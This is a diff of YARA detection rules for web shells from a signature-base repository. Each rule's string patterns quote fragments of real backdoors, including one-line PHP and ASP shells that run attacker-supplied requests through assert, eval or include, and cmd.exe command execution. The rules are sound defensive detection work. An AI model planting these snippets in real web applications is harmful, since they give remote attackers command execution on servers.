 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L697-L711"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1802-L1815"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b7800364374077ce8864796240162ad5"
-		logic_hash = "bdeffafdedeadaba36c5c67f981c42d6111b954622780b930e9eeb9956c638b5"
+		hash = "0421445303cfd0ec6bc20b3846e30ff0"
+		logic_hash = "ae0cca5723a1e885c26ece5082c24f4c95f0262b8e7baf6db5efde5cfee2cc42"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"
-		$s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
+		$s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Azrailphp_V1_0
+rule SIGNATURE_BASE_Webshell_Php_Backdoor
 {
 	meta:
-		description = "Web Shell - file aZRaiLPhp v1.0.php"
+		description = "Web Shell - file php-backdoor.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L712-L726"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1816-L1830"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "26b2d3943395682e36da06ed493a3715"
-		logic_hash = "d0ccf9e37e378db4523d7918b30cff358115e7a4c36fad55a75f3aff218563c6"
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+		logic_hash = "1f754b4d29eb93316183cf904b375ded7ccdae1d2196fe05950c449ed0d690f4"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"
-		$s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"
+		$s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
+		$s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_List
+rule SIGNATURE_BASE_Webshell_Asp_Dabao
 {
 	meta:
-		description = "Web Shell - file list.php"
+		description = "Web Shell - file dabao.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L727-L742"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1831-L1845"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "922b128ddd90e1dc2f73088956c548ed"
-		logic_hash = "007f9307493bca71dcbdcf6ba6c45bf36899e8f636ccbd09c26453cb0aea0847"
+		hash = "3919b959e3fa7e86d52c2b0a91588d5d"
+		logic_hash = "62cf46dc16a7365d196c2cb8ede8b1380a0877d134d3726d7c777096a4eda942"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "// list.php = Directory & File Listing" fullword
-		$s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"
-		$s9 = "// by: The Dark Raver" fullword
+		$s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &"
+		$s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Ironshell
+rule SIGNATURE_BASE_Webshell_Php_2
 {
 	meta:
-		description = "Web Shell - file ironshell.php"
+		description = "Web Shell - file 2.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L743-L757"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1846-L1859"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
-		logic_hash = "7e4916010a33383cfc3cbbcd5d575ac2f3a579220b66bd07e3121f3db30da66d"
+		hash = "267c37c3a285a84f541066fc5b3c1747"
+		logic_hash = "bd485c825ae7ac11ff67d109d3c07fb405272a5919e00af39788d1a9c94e754d"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""
-		$s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"
+		$s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_404
+rule SIGNATURE_BASE_Webshell_Asp_Cmdasp
 {
 	meta:
-		description = "Web Shell - file 404.php"
+		description = "Web Shell - file cmdasp.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L758-L771"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1860-L1874"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"
-		logic_hash = "0743d18bc5066c96cca8cc0883971d3bc876e6c2fbb996e55b6930c715e07395"
+		hash = "57b51418a799d2d016be546f399c2e9b"
+		logic_hash = "4259419b4db8e6a83df6f7d258d41028f7f76b0fd2308eeadb4555066c5a2940"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Aspydrv
+rule SIGNATURE_BASE_Webshell_Spjspshell
 {
 	meta:
-		description = "Web Shell - file aspydrv.asp"
+		description = "Web Shell - file spjspshell.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L772-L785"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1875-L1888"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "de0a58f7d1e200d0b2c801a94ebce330"
-		logic_hash = "a4a6205ace49778ddc421b0f0e65c576e2ffe40ce2ab84debb939d5324420405"
+		hash = "d39d51154aaad4ba89947c459a729971"
+		logic_hash = "7926eadd3ffb21de73a63e7a28a525037bf88396ea369599b41ac8c0b0d112ad"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"
+		$s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Web
+rule SIGNATURE_BASE_Webshell_Jsp_Action
 {
 	meta:
-		description = "Web Shell - file web.jsp"
+		description = "Web Shell - file action.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L786-L799"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1889-L1903"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4bc11e28f5dccd0c45a37f2b541b2e98"
-		logic_hash = "ed0ace0ba5f8a9e763353c42e3e3a39da10596e8517aad33e5c5080b44e4d61a"
+		hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"
+		logic_hash = "5ea7d074d0fe98cf2514a65231013a374532d6b3aa2487bcc34d4285f558752a"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."
+		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
+		$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Mysqlwebsh
+rule SIGNATURE_BASE_Webshell_Inderxer
 {
 	meta:
-		description = "Web Shell - file mysqlwebsh.php"
+		description = "Web Shell - file Inderxer.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L800-L813"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1904-L1917"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "babfa76d11943a22484b3837f105fada"
-		logic_hash = "365d19c086b3bbb98cbe1e1ed1e7522ce98dc2614a39c747717c277cebef33d2"
+		hash = "9ea82afb8c7070817d4cdf686abe0300"
+		logic_hash = "915f2f38c1ca1321980ac66ebb95b0c46443e0ba64cc4b2014200db43439c85e"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"
+		$s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jspshell
+rule SIGNATURE_BASE_Webshell_Asp_Rader
 {
 	meta:
-		description = "Web Shell - file jspShell.jsp"
+		description = "Web Shell - file Rader.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L814-L828"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1918-L1932"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"
-		logic_hash = "058ddd64b142cada7144b9befa81ada314b72e6f23524d98efcb10136c23ed33"
+		hash = "ad1a362e0a24c4475335e3e891a01731"
+		logic_hash = "b578f3e844cbb361f455e55353fad2f0134ede7c3c468cebad9ae265e6e768b8"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"
-		$s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"
+		$s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"
+		$s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Dx_Dx
+rule SIGNATURE_BASE_Webshell_C99_Madnet_Smowu
 {
 	meta:
-		description = "Web Shell - file Dx.php"
+		description = "Web Shell - file smowu.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L829-L843"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1933-L1951"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
-		logic_hash = "c2eddf58b25caff79460ab9a87ac0573d483866a87c1b1ec0984afce2c22b29f"
+		hash = "3aaa8cad47055ba53190020311b0fb83"
+		logic_hash = "5c4f76bdbe535a899e40c890eb1ea65e070c781fe5dd44cf13d4832cfd6d2e13"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
-		$s9 = "class=linelisting><nobr>POST (php eval)</td><"
+		$s0 = "//Authentication" fullword
+		$s1 = "$login = \"" fullword
+		$s2 = "eval(gzinflate(base64_decode('"
+		$s4 = "//Pass"
+		$s5 = "$md5_pass = \""
+		$s6 = "//If no pass then hash"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Ntdaddy
+rule SIGNATURE_BASE_Webshell_Php_Moon
 {
 	meta:
-		description = "Web Shell - file ntdaddy.asp"
+		description = "Web Shell - file moon.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L844-L858"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1952-L1967"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c5e6baa5d140f73b4e16a6cfde671c68"
-		logic_hash = "7237eb7233c6affcc1f67a764f704b7d7e1d13f71c64893286c6c99318cc7c3e"
+		hash = "2a2b1b783d3a2fa9a50b1496afa6e356"
+		logic_hash = "4e26dbef647caee19a8707a067c228ba96bd986369e4c87c68964ae42c85b09a"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "if  FP  =  \"RefreshFolder\"  or  "
-		$s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  "
+		$s2 = "echo '<option value=\"create function backshell returns string soname"
+		$s3 = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""
+		$s8 = "echo '<option value=\"select cmdshell(\\'net user "
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Mysql_Web_Interface_Version_0_8
+rule SIGNATURE_BASE_Webshell_Minupload
 {
 	meta:
-		description = "Web Shell - file MySQL Web Interface Version 0.8.php"
+		description = "Web Shell - file minupload.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L859-L872"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1969-L1983"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "36d4f34d0a22080f47bb1cb94107c60f"
-		logic_hash = "680d4368804ad21e46dbe400563beca3ef724711b5432dccce1276ecadc04f2c"
+		hash = "ec905a1395d176c27f388d202375bdf9"
+		logic_hash = "53dea3ea0e2cf83907273fa7f64b21b40e9a5c8e4aa34e5d46d2762396fa89ce"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"
+		$s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword
+		$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Elmaliseker_2
+rule SIGNATURE_BASE_Webshell_ELMALISEKER_Backd00R
 {
 	meta:
-		description = "Web Shell - file elmaliseker.asp"
+		description = "Web Shell - file ELMALISEKER Backd00r.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L873-L887"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1984-L1998"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
-		logic_hash = "ca300cd142b3c8b820d3b5f5a56eeb834d9acb1d85916b932bd67fb4a25f4ed0"
+		hash = "3aa403e0a42badb2c23d4a54ef43e2f4"
+		logic_hash = "c5eea930dc386c60e60f052c4945c8d6c0125d3500e60794e21d5ea04f226628"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"
-		$s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"
+		$s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio"
+		$s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Remexp
+rule SIGNATURE_BASE_Webshell_PHP_Bug_1_
 {
 	meta:
-		description = "Web Shell - file RemExp.asp"
+		description = "Web Shell - file bug (1).php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L888-L902"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1999-L2012"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
-		logic_hash = "7a3b35c4a16f26167180cea81f67de101edabb9b35479f7e5acae7f3fe07f304"
+		hash = "91c5fae02ab16d51fc5af9354ac2f015"
+		logic_hash = "12b957b7e0d0823721273ab71a19ee62d84a8dc5f584a46691f0e0aef996386e"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"
-		$s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"
+		$s0 = "@include($_GET['bug']);" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_List1
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_Hkmjj
 {
 	meta:
-		description = "Web Shell - file list1.jsp"
+		description = "Web Shell - file hkmjj.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L903-L917"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2013-L2026"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"
-		logic_hash = "61ecafe477d98c5eb6887a9ff50960fc28b84512d09a36c02588159b08b395a4"
+		hash = "e7b994fe9f878154ca18b7cde91ad2d0"
+		logic_hash = "9a25df170ed165fe6528e6b9374ae572bcd26cd2e1f4014c7aa4953122671fac"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"
-		$s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""
+		$s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Phpkit_1_0_Odd
+rule SIGNATURE_BASE_Webshell_Jsp_Asd
 {
 	meta:
-		description = "Web Shell - file odd.php"
+		description = "Web Shell - file asd.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L918-L933"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2027-L2041"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "594d1b1311bbef38a0eb3d6cbb1ab538"
-		logic_hash = "bf99d6a71b9ef72574d928a09f3a479f2f819287d78c9a5435e45752e76a59bf"
+		hash = "a042c2ca64176410236fcc97484ec599"
+		logic_hash = "6620b796b55a67010cd3edebc2ec84c2657717722129ea46288d262cfd1c7e1c"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "include('php://input');" fullword
-		$s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
-		$s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+		$s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
+		$s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_123
+rule SIGNATURE_BASE_Webshell_Metaslsoft
 {
 	meta:
-		description = "Web Shell - file 123.jsp"
+		description = "Web Shell - file metaslsoft.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L934-L949"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2043-L2056"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c691f53e849676cac68a38d692467641"
-		logic_hash = "48925d3a302bf09ecb3f031301ca8afc722c7ef53b87efa27a3c4b58ee15217d"
+		hash = "aa328ed1476f4a10c0bcc2dde4461789"
+		logic_hash = "20d938fbe21bcf04f09c6450a9acd5db556e9c9f83149d3cdd098be7a905d5ca"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"
-		$s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
-		$s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword
+		$s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_1
+rule SIGNATURE_BASE_Webshell_Asp_Ajan
 {
 	meta:
-		description = "Web Shell - file 1.asp"
+		description = "Web Shell - file Ajan.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L950-L964"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2057-L2070"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8991148adf5de3b8322ec5d78cb01bdb"
-		logic_hash = "9cae40c8fc3966942a8fc3ee0f5d07081ba2d1c1c3156144488ba64015d6838b"
+		hash = "b6f468252407efc2318639da22b08af0"
+		logic_hash = "1817786725de61150f1b3ff57597c780323a7f4df1c046cfd473e1918decd7d2"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "!22222222222222222222222222222222222222222222222222" fullword
-		$s8 = "<%eval request(\"pass\")%>" fullword
